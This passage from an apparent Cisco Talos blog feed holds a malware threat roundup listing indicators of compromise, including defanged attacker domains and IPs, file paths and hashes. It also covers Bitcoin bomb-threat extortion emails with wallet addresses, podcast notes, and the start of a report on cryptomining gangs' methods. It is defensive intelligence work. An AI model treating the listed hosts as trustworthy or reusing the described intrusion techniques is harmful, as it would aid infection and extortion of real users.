c1b87392cafff0a07c0dedfa59da2936a371bf2e40855c9b1a1d6bf66903ef12
c56b47185d4176e620a12ba8f752a67d4e264919127970f0f8bb567f5f778511
d9cc0b9443f5ec4f84070165ddd08d3def72662df47b52795b793725547816b3
dafa195b9f7cf1b3d249ccc6e40bbc181aa54878faf3411b78ccea85e4e4f255
e77216030291a46d69d4bdf5725dc052d16e6ed7d6485b85cfcc8c4b88bc4313

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

Xls.Downloader.Jums-6779285-0

Indicators of Compromise

Registry Keys

Mutexes

Global\552FFA80-3393-423d-8671-7BA046BB5906
Local\ZonesCacheCounterMutex
KYIMEShareCachedData.MutexObject.Administrator
KYTransactionServer.MutexObject.Administrator

IP Addresses contacted by malware. Does not indicate maliciousness

192[.]185[.]16[.]22
192[.]254[.]237[.]11

Domain Names contacted by malware. Does not indicate maliciousness

www[.]aaaplating[.]com
weighcase[.]co[.]uk

Files and or directories created

%LocalAppData%\Temp\VBE\MSForms.exd
%AppData%\Microsoft\Excel\XLSTART
%UserProfile%\Documents\20181119
%TEMP%\tmp907.bat
%LocalAppData%\Temp\tmp016.exe
%LocalAppData%\Temp\CVR4F0E.tmp
%LocalAppData%\Temp\twaibr0n.00s.ps1

File Hashes

199f1eec8413168be6418ace60cfe760d858350ebef3605aa91d47338b881e0c
1f444338e19212dfe5f597ceb3b55f06a8b927a342ce50d0c5ae4452d4999e80
49fbb593eb1418ecbbefd3ac0529ccf1ed2ef64e20927a5e0379f99ec9fd0c9b
5ac6fb69b5c55ec6419b89e22ce7fd873d11d263ae2eda9ff85e8eda10b20444
644f8f3822eb0c5435ffbec711a0b2821e1fa050ca10c837a62c02a9df814d9d
77f27841d4263d1ed6ba59267d78a454c9a2a3383ee3f1a2a5ddbed4e835dd06
83cf5c7623bc92966e02b594bb41ab3896b1ffaae748d7cc9b4331f3f435f171
9a422430a9443b77b5959847657ec411736e180b30563b5066d1ea0c7b22633e
9bfd539bb55f7a7a5a8df5a0e3ecd87157ecd87675915ac01ca6ce62a3402872
9dbd2fc30b9c22fb03df72eb46ea83af41449bb6054cdf8cd83e5520de633641
a46e400bbf7b921a5b2e131ac3c8bf10506569466ad3fff99381c411e585192d
a6043595251b41b336ca8bc2ccc05bc2bf2781274c1893d6943141a4bd3cf637
a6d95c0eac0c0b584faa37c1e21ee5baad74e227685275899a9d8c5ac2806b9d
be6ac030af25e2044cf8889d747fa170bcbb10a325a3f05f67194379f86375ca
c7c3ded9554e8ca38031ab080c1ed9d775a20ac928eaded8d24fb325d7c6be1f
cba2b5d0949ff517c40f74cf166b7c363dbf54bda30d4e8432f31da674a78b9c
e4fcc415e1f7cec20991a6e5612c7706c1187e23ecea5115fbeea824c9b06c14
efd04977ffd67e71dc9730268a7cee0b85ca128c0e0e3962b073494e5e9f2081
f495fc57c7bd8311cee17ea6dc15c953d21c5fd97147e632a509b07217855501

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Win.Virus.Sality-6780277-0

Indicators of Compromise

Registry Keys

Mutexes

uxJLpe1m
wininit.exeM_320_
winlogon.exeM_356_
wudfhost.exeM_1644_
\BaseNamedObjects\uxJLpe1m
\BaseNamedObjects\csrss.exeM_528_
\BaseNamedObjects\services.exeM_664_
\BaseNamedObjects\lsass.exeM_676_
\BaseNamedObjects\svchost.exeM_1008_
\BaseNamedObjects\smss.exeM_364_
\BaseNamedObjects\spoolsv.exeM_1560_
\BaseNamedObjects\winlogon.exeM_552_
\BaseNamedObjects\ctfmon.exeM_204_
\BaseNamedObjects\svchost.exeM_912_
\BaseNamedObjects\userinit.exeM_1372_
\BaseNamedObjects\svchost.exeM_832_
\BaseNamedObjects\jqs.exeM_1736_
\BaseNamedObjects\rundll32.exeM_948_
\BaseNamedObjects\explorer.exeM_1456_
\BaseNamedObjects\svchost.exeM_1116_
\BaseNamedObjects\wmiprvse.exeM_440_
wmiprvse.exeM_776_
\BaseNamedObjects\wmiadap.exeM_3280_
\BaseNamedObjects\356677150.exeM_1408_
\BaseNamedObjects\wmiprvse.exeM_1688_

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

\??\E:\autorun.inf
%System32%\drivers\lhlnn.sys
%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[1].txt
%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@cargocrystal[2].txt
%SystemDrive%\Documents and Settings\Administrator\Cookies\administrator@samayer[1].txt
%LocalAppData%\Temp\wingqijig.exe
%SystemDrive%\okieu.exe
\??\E:\mshy.pif
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\augx.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bvwf.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ceohbt.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\cevjx.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dkgn.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\easrrv.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\gekhk.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\glya.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hpqd.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ixway.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jbccl.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jhrim.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\jvuj.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kdpw.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\kwih.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmbonl.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lpig.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ltyyd.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mqsr.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mskjgp.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mslmw.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ndcdl.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\niut.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nixbf.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nygs.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\olsit.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ospd.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\pffcy.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rfioy.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rxoqk.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tguha.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tvuin.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\uspe.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vkecy.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vtba.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vxqq.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\vylwe.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\whtfo.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winadpngm.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winasew.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winauunwn.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbkjyy.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbpcf.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winbusg.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windlwd.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\windpbi.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wineeyux.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winesrg.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfjvcgs.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winfpmye.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winiuak.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjenpka.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winjkyn.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkqxb.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winkrepqp.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winktee.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlbehwb.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlihxj.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlsbpg.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlxanm.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlywa.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winmtfju.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winneng.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnjxa.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winnurxrn.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winodpm.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winohuuif.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winolmyt.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winonwqwp.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpcpvjx.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdae.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpdgmo.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpgqpu.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpmlm.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpnsv.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winpuybd.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wintqckmy.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winudusnh.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winuixn.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvcwb.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winvxxb.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbnx.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winwbppmo.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winydntxg.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyksvqi.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winyqksg.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xfkklk.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xgvmsf.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xmjmf.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xwota.exe
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yxjkrt.exe
%SystemDrive%\eetdut.exe

File Hashes

02e3ca0b78494efa9c54f41856fbf50478673329ea238c7786bdeb30542e5ed5
034336a710468f49c1eed9d375a85d4d7f48ecc271dde830f60b428d52a94c2b
0a9a606be52079bc06d34ee969313e58809c8bf4978e31101ce329b7651f564e
2055ba5f6fa09c201359729adc6c0e20ad97346d698b5801b601d29a85e78c52
34b3a1c08a185f7755b8fe3f741e13a6452b46766b2b564cd329c45bd45e1c76
38764b867874a08bd44e8a4b78b670e7445f93af546fba0443c99f56d469a951
3bd14203a0587eea25421d679fc5d7c598464e5fde6f39cf7e6a506fa86aaf5c
40d8f51d911e4f4d3fa29fcd39adc9e826557727dc1ec411404d6bd09c7f8c35
518b8b1dea7caf5f1c2d9b6f6ef32ba70effc2f74ebd7a902434fc66e179700e
609dcb6f088836745f24a24d71b49e092196b08a9924f42e8b63b92f4c0ebe24
6f8fec09c16a0f5bb60e3ec4cd1a41cb34a2eaa59d0351f5f875a83dd7ec8411
76cb38ecf5c3b925e946b6da3cc78e25e0df6db48c66073a6dc33bb8bc03cb5c
78784ee614b06d505879ec8454a80843416aa89869ecfb7eb059aadb14027178
7d5787833d365d5a2d84c0e6135106bd6d5a49de4da86857995cf0222491c028
8089f6db67efb482755dfc06ee4efe7271e685136e46a231b06bff87aca4393b
9af10868ac775ec789e3b9e7475015c3ba66f9ed35aabcfe8ea323b9b1a8d7a5
9fadad87f4763f5a062c0c12677b3b549f9df261484ad89cf58bb60809751e9c
a543f5d10445af1ce7710cc596b2b6ab0532cef51e9041b8f8c58bd36b218dd9
ac9ee5d47307f578e1a19a96dfb509a5063045a339ffcf1dc79f6a559f6385c3
c3a88516553f23807115597f99f0b8f9e8a62c68bf7ee321bf1ff6c599c3c8f1
c96d2cd51eff903958ccc279fa48e392e858403aead3add4b00e6e9b031d5754
d2da9a2988364a576679489265765e8bd5419ea66e8aea48e666a5300f2c5e6f
e080790b62f025fedc93b161dc061421ae47cf4785ecb1744d6da1be44f8667a
e1a951d34a0c35cc5a011242189ed82707d3fc40289b37470169703f269d88f4
e1d9701b9af405e448e57714ee762722c3ddc6306d271038c350b0cfc138cebc

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Doc.Malware.Powload-6775735-0

Indicators of Compromise

Registry Keys

Mutexes

Global\552FFA80-3393-423d-8671-7BA046BB5906
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
RasPbFile
Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500
Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500
Local\10MU_ACB10_S-1-5-5-0-57527
Local\10MU_ACBPIDS_S-1-5-5-0-57527
Local\WinSpl64To32Mutex_e162_0_3000
\BaseNamedObjects\Global\.net clr networking

IP Addresses contacted by malware. Does not indicate maliciousness

199[.]188[.]200[.]110
185[.]72[.]59[.]32
185[.]87[.]51[.]118
185[.]2[.]4[.]116
177[.]185[.]194[.]161

Domain Names contacted by malware. Does not indicate maliciousness

www[.]w3[.]org
tecleweb[.]com[.]br
chiporestaurante[.]com
www[.]onecubeideas[.]com
onecubeideas[.]com
dc[.]amegt[.]com
fortools[.]ru

Files and or directories created

%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
%LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{257D7FC1-A1F1-4741-80E5-4CCDA3324B78}.tmp
%AppData%\Microsoft\Templates\~$Normal.dotm
%AppData%\Microsoft\Word\STARTUP
%AppData%\Microsoft\Office\Recent\index.dat
\EVENTLOG
\ROUTER
%UserProfile%\Documents\20181207
%LocalAppData%\Temp\705.exe
%LocalAppData%\Temp\CVR8C5B.tmp
%AppData%\Microsoft\Office\Recent\355848530.doc.LNK
%SystemDrive%\~$5848530.doc
%LocalAppData%\Temp\fjzx2n2i.cc2.ps1
%LocalAppData%\Temp\qfrje44a.wpp.psm1
%LocalAppData%\Temp\~DF25D3033E1B874DBC.TMP
%AppData%\Microsoft\Office\Recent\37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c.LNK

File Hashes

02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf
0aac7ab733c51437873bf791b28557b12e027bf9bf1b3eafcde05388010af655
0cc53d287e5df9017989526addc988b49fcd76894032458720acad7c265df9de
14ab7c3501e5ea1482687558d1544698b85cd9b24b3580245a85ce0b781c03e7
1af67c800700954695d42c3e124753750016b7c598c6fa2f9bcd9f85723dd1c6
1bfc31debc05dc83864b01ddf300552ec6496cc0d1c25b5846fcd2a4c5da93df
1e0c90f629beae558c6af53c3def9cda4bc77d06cd42131b8f969ff0da9afe25
1ff1729697c956aa4270731f63686d2f6aa1e86a47d219f32058fa67be31817f
21982965fc5661c509d1833f8fe9caf02d7649619b7b542d7a735abd7936a9cd
21e781747a69ebeda636616b47fdd4ff871b9c672aad10f3cf95cbd55eb8b169
239fea895e2a4a3bd3c3339ce48b2f330bd611d8120e0937aca1c8581e977849
2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3
2b3064f31f52b8d33a9a7f73c1624252f4a2b615df0c99b4c70b4c617eed87fa
2c97f2997575df803d28dd38636856fd0efb9fa7efaea22c526b8dc71daa9aee
370c83daaa8ad3c9e1f684ac93a5c7436e86bab917f8511544792f083fd8d127
37c08bc14f578f0b19f992648c113e46dc49e0ad1ddc9cd2e63dfb9242fe151c
3ac2d948a193f03d6d6bbd288ab9ae2b58588567e459aecae80a66e00a291847
3b958df2dedb42704c2baf7b9dff89112db8e8297a594ebe98303f9913004e9b
54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be
56de2fad613807e46613e7159681a962cc8c54fc6ed20c7c3e90e104cdbfeaff
590cb8e2648bc9566d2709a22d33369309e32ddfcf6cf725dfce6b0efb2b51b3
5a2763ea3481568a73456a2e784b6b31b32845ec08df99b3394533ecdb0f973a
5f47e689fb44578d43e4c7590ce10c275f7f533c894387086bf5e0bb3a68e46d
626ead7063f00752432c54dcb61975b060e306f2712fa2fb1e6f3aa4cc406e1a
6714f37afcbe1d0685770f9558c40d0856e7c337f8d4c4beb7e312672adda950

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

PUA.Win.Trojan.Hupigon-6776762-0

Indicators of Compromise

Registry Keys

Mutexes

Local\MSCTF.Asm.MutexDefault1
\BaseNamedObjects\ISPWizard Mutex
ISPWizard Mutex

IP Addresses contacted by malware. Does not indicate maliciousness

Domain Names contacted by malware. Does not indicate maliciousness

Files and or directories created

%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpsetup.exe
%System32%\rnaph.dll
%LocalAppData%\Temp\tmpsetup.exe

File Hashes

0d72d9ee3de3e8ac191444390ba097b471e72fe6ff951b8d77f2107486f1310d
174751136660fe996a57657e8ec2205ad9a5e9efe8eaa5078b714f5fb51cf9a2
1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9
4d2719868251d27b80b746161fcb2eb78e5ce1927b10c4da5f782ccc51b619e5
835a2e9ef6349c641ac1e786aae48338c88e76315a2ce4fd4c43903304984093
a1a60ca213175febdcc3ff1bc578053c563a6d33c40312f46f3118464e2c9b34
c6f5fcd39af9fe1a342d5b55b09c74c5cc29c666becdc583098e0a09883491c5
d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411
e1d008fcb364fa01413eb0710ec049f74e791b17ae25d8f27fe857a7ff9aa8f9
f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4

Coverage

Screenshots of Detection

AMP

ThreatGrid

Malware

↧

Bitcoin Bomb Scare Associated with Sextortion Scammers

December 14, 2018, 9:57 am

≫ Next: Beers with Talos EP 43: Espionage, Encryption, and CISO Square One

≪ Previous: Threat Roundup for Dec. 7 to Dec. 14

This blog was written by Jaeson Schultz.

Organizations across the country are on edge today after a flurry of phony bomb threats hit several public entities Thursday, such as universities, schools and news outlets, among others. The attackers distributed malicious emails claiming to have placed some type of explosive materials in the recipient's building. The emails stated the attackers would detonate these explosives unless the victim made a Bitcoin payment of several thousand dollars.

Cisco Talos discovered that this campaign is actually an evolution of sextortion and extortion attacks that we reported on in October. The claims in the emails we've seen from this actor are completely false, yet they have caused untold amounts of damage as organizations have evacuated buildings and called upon law enforcement to investigate.

An example of the malicious, phony emails that attackers sent out to organizations across the U.S. yesterday.

What makes these particular extortion messages unique from other extortion scams we've monitored is that, previously, the attackers threatened only the individual — the attackers would threaten to expose sensitive data, or even attack the recipient physically, but there was never any threat of harm to a larger group of people, and certainly not the threat of a bomb.

Talos has discovered 17 distinct Bitcoin addresses that were used in the bomb extortion attack. Only two of the addresses have a positive balance, both from transactions received Dec. 13, the day the attacks were distributed. However, the amounts of each transaction were under $1, so it is evident the victims in this case declined to pay the $20,000 extortion payment price demanded by the attackers.

So far, all of the samples Talos has found to be associated with the bomb threat attack were sent from IP addresses belonging to the domain registrar and hosting company reg.ru, suggesting that the attackers in this case may have compromised credentials for domains that are hosted at this particular domain registrar. Multiple IPs involved in sending these bomb threats also sent various types of sextortion email that we saw in the previous campaign. In those cases, the attackers sent out emails claiming to have compromising videos of the victim and will release them to the public unless the attacker receives a Bitcoin payment.

As of late yesterday, the bomb threat email attack morphed. The attackers have returned to their empty threats of harming the individual recipient. This time, they threaten to throw acid on the victim.

An example of the newer extortion emails, claiming they will dump acid on the victim unless they receive a Bitcoin payment.

So far, none of the Bitcoin addresses associated with these new emails have received any payments. The source of the sending IP addresses changed, however. This time, the attackers are making heavy use of IP addresses at the Russian hosting company TimeWeb. As with the bomb threats, these IP addresses belong to domains that the attackers likely compromised.

The criminals conducting these extortion email attacks have demonstrated that they are willing to concoct any threat and story imaginable that they believe would fool the recipient. At this point, we have seen several different variations of these emails, and we expect these sorts of attacks to continue as long as there are victims who will believe these threats to be credible, and be scared enough to send money to the attackers. Talos encourages users not to fall for these schemes and — above all — DO NOT pay extortion payments. Doing so will only confirm for the attackers that their social engineering approach is working, and victims' money goes directly toward facilitating additional attacks.

IOCs (BTC Addresses)

11B68RbmyxQys2CXXbAZxcwVXnaWCNBbw
12MET3CnEBkRc5Si5udf95fGaTZ6JwgpkK
132f8T1qF9hZj13MvPN5FbxrAhGExYZ7P3
149oyt2DL52Jgykhg5vh7Jm1QpdpfuyVqd
15F7TCqGRWE66xrBNxyt9ko1XsKaQvEh9t
15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM
1893DMwnrq9vA6JmQBdyWRKecArDAUTcGR
18UNWkvEDXgYzSAVnTmaR1X66w3T7HHsdn
1BTuxsCpAGtCzcszvFV2g4beqAZ2AUnyFh
1BfmmRBfhujpK944gai4vWvwCwGeHKbmkB
1BHasGex1jhRZeY7KyUGGKUNRtVgKedRY8
1CDs3JXUU6wNmndAF7EFcrJ6GGSYRKXd7w
1CF9VQhwjJutPxwVq5QLFA7j7baq4RDb3w
1CXrmcKL7W2o6FnrFx3ZBGn2EAsbMVZMzD
1CdD3nthrWR76RkL1WwLH7BSqCFASLjbhu
1D3ArQebDneVBVCqLort9jwvUA3AoZaNq5
1DVVQpxF4nG7rmuQFb7ZboGxu6ahKJcjf5
1Dnw2qJxGFCZdE3PzCaVioBB9zERc7SzRB
1DRXeydtqfjAmvfrLY7XiCo2A1vCq32z3a
1Ebf2rrLxVuMGKkwi2PeZtjBEEiidxrkkL
1FnTQHffH42iS15FMYNZxmNdbXtmb8WChF
1GTd6DPqcxCwX263BMsvk7FcjCQxsXhJUs
1GYAJY3GRsC5twdPgmQiEeNjdn7Kx6KSPd
1L5SWCu4ZTLiyPyTAvfSVjhKrYNSnYgBKk
1LEevM4MxKSGRrTvVrvLyjiuq3vYssdTRa
1LT4WgSuTD71Emzc7DLeHxVoZ1RjkhNcFY
1LTYBLzVSLe6GDFJ5NVVxLR2j5eQ8Wy51N
1LjxZonruwcKXEUYySrXt7gWGJLL6Pzuyx
1M9r1FpWj5QbSMECeJvXoa85TDMpoQcRaT
1MeDDtvZB5TE5tDTcwk6GiGSK3sTAP2KLA
1P3cNFy3SdfZ8PvMSdgLRcb2TtaLvxfqat
1PqX7bMnCzpJ7L1mxuGgNyaJSkJRM8SjES

Coverage

↧

Beers with Talos EP 43: Espionage, Encryption, and CISO Square One

December 14, 2018, 11:46 am

≫ Next: Connecting the dots between recently active cryptominers

≪ Previous: Bitcoin Bomb Scare Associated with Sextortion Scammers

Beers with Talos (BWT) Podcast Ep. #43 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #43 show notes:

Recorded Dec. 7, 2018.

Several of us are under the weather, but the show must go on. We did our best, as always. After running through some recent research, we spend a good bit of this EP looking through the lens of a recent breach at the first things a new security leader should get a handle on - what questions need to be answered? What information and practices are day-1 vital? We wrap up taking a look at a slew of vulns Talos uncovered in secure messaging apps.

The timeline:

The topics

01:00 - Roundtable - we talk about the Reds, death by IoT lawnmowers, and the special Spam we get
12:40 - DNSpionage campaign and DNS redirection attacks
20:50 - Day One as CISO - Handling Inherited Risk as a Leader
50:45 - (in)Secure messenger apps - Ranging responses to vuln disclosures
1:02:36 - Closing thoughts and parting shots

The links

DNSpionage blog post

(in)Secure messaging blog post

==========

↧

Connecting the dots between recently active cryptominers

December 18, 2018, 8:33 am

≫ Next: As Cryptocurrency Crash Continues, Will Mining Threat Follow?

≪ Previous: Beers with Talos EP 43: Espionage, Encryption, and CISO Square One

Post authored by David Liebenberg and Andrew Williams.

Executive Summary

Through Cisco Talos' investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many of these campaigns shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. However, closer analysis revealed that a spate of illicit mining activity over the past year could be attributed to several actors that have netted them hundreds of thousands of U.S. dollars combined.

This blog examines these actors' recent campaigns, connects them to other public investigations and examines commonalities among their toolsets and methodologies.

We will cover the recent activities of these actors:

Rocke —A group that employs Git repositories, HTTP FileServers (HFS), and Amazon Machine Images in their campaigns, as well as a myriad of different payloads, and has targeted a wide variety of servers, including Apache Struts2, Jenkins and JBoss.

8220 Mining Group —Active since 2017, this group leverages Pastebin sites, Git repositories and malicious Docker images. The group targets Drupal, Hadoop YARN and Apache Struts2.

Tor2Mine —A group that uses tor2web to deliver proxy communications to a hidden service for command and control (C2).

These groups have used similar TTPs, including:

Malicious shell scripts masquerading as JPEG files with the name "logo*.jpg" that install cron jobs and download and execute miners.

The use of variants of the open-source miner XMRig intended for botnet mining, with versions dependent on the victim's architecture.

Scanning for and attempting to exploit recently published vulnerabilities in servers such as Apache Struts2, Oracle WebLogic and Drupal.

Malicious scripts and malware hosted on Pastebin sites, Git repositories and domains with .tk TLDs.

Tools such as XHide Process Faker, which can hide or change the name of Linux processes and PyInstaller, which can convert Python scripts into executables.

We were also able to link these groups to other published research that had not always been linked to the same actor. These additional campaigns demonstrate the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

The recent decline in the value of cryptocurrency is sure to affect the activities of these adversaries. For instance, Rocke began developing destructive malware that posed as ransomware, diversifying their payloads as a potential response to declining cryptocurrency value. This was a trend that the Cyber Threat Alliance had predicted in their 2018 white paper on the illicit cryptocurrency threat. However, activity on Git repositories connected to the actors demonstrates that their interest in illicit cryptocurrency mining has not completely abated. Talos published separate research today covering this trend.

Timeline of actors' campaigns

Timeline of Activity

Introduction

Illicit cryptocurrency mining remained one of the most common threats Cisco Talos observed in 2018. These attacks steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. Campaigns delivering mining malware can also compromise the victim in other ways, such as in delivering remote access trojans (RATs) and other malware.

Through our investigation of illicit cryptocurrency mining campaigns in the past year, we began to notice that many shared remarkably similar TTPs, which we at first mistakenly interpreted as being attributed to a single actor. After completing analysis of these attack's wallets and command and control (C2) servers we discovered that a spate of illicit mining activity over the past year could be attributed to several actors. This illustrates the prevalent use of tool sharing or copying in illicit mining.

We also observed that, by examining these groups' infrastructure and wallets, we were able to connect them to other published research that had not always been related to the same actor, which demonstrated the breadth of exploitation activity that illicit cryptocurrency mining actors engaged in.

We first started tracking these groups when we began monitoring a prolific actor named Rocke and noticed that several other groups were using similar TTPs.

We began following the activities of another prolific actor through a project forked on GitHub by Rocke: the 8220 Mining Group. We also noticed a similar toolset being used by an actor we named "tor2mine," based on the fact that they additionally used tor2web services for C2 communications.

